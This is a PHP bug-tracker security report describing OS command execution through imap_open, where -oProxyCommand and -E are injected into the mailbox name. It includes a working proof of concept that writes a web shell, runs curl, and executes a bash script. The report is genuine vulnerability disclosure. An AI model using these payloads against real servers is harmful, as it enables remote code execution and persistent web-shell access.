php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #76428 Command execution through imap_open
Submitted: 2018-06-08 01:03 UTC Modified: 2018-11-20 19:37 UTC
From: c dot r dot l dot f at yandex dot ru Assigned:
Status: Duplicate Package: IMAP related
PHP Version: 7.0.30 OS: Debian Linux
Private report: No CVE-ID: None
 [2018-06-08 01:03 UTC] c dot r dot l dot f at yandex dot ru
Description:
------------
Hello.

Some PHP CMS/CRM's uses IMAP package in it's features. I was encountered with such functionality in my research and found ability to execute OS commands through imap_open function. Which can be exploitable remotely or locally to bypass disabled_functions and open_basedir.

The test was conducted on fresh "Debian 9" with "PHP 7.0.27", but most likely it's not important, because I think there are some problems in "libc-client" and this may affects other distros.

For some reasons "libc-client" uses "/usr/bin/rsh" for check(?) connection to a given hostname and adds additional arguments, if a space char is presents in the giving mailbox. Then all argument goes to "execve" call.

In debian based distros "rsh" is a link to "ssh", so "-oProxyCommand" option can be used for command execution and "-E" for file write.

Test script:
---------------
Remote:
<?php
//File write:
//<?=eval('eval('.strtoupper('$_REQUEST').'["x"]);');?> -E shell.php}
//
//RCE:
//server=x -oProxyCommand="`curl$IFS''localhost?PWN`"}&login=1&password=1

imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX', $_POST['login'], $_POST['password']);
?>

Local:

<?php
file_put_contents('x','touch /tmp/PWN');
chmod('x', 0755);
imap_open('{x -oProxyCommand="`bash$IFS\'\'x`"}', 0, 0);
unlink('x');
?>

Expected result:
----------------
Connection error

Actual result:
--------------
Unexpected OS command execution

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2018-06-20 04:31 UTC] stas@php.net
If libc-client indeed uses shell on mailbox name without filtering, that bug should be reported to libc-client maintainers. I am not sure what PHP could do here if the offending code is inside libc-client.
 [2018-06-20 04:31 UTC] stas@php.net
-Status: Open +Status: Suspended
 [2018-06-20 15:23 UTC] c dot r dot l dot f at yandex dot ru
Since package uses third party code, I think that you must indicate that unfiltered user data can lead to unpredictable consequences and you have nothing to do with it :)
 [2018-11-20 19:36 UTC] stas@php.net
-Status: Suspended +Status: Duplicate
 [2018-11-20 19:36 UTC] stas@php.net
See bug #76428
 [2018-11-20 19:37 UTC] stas@php.net
Oops I meant bug #77153
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Mar 28 20:01:28 2024 UTC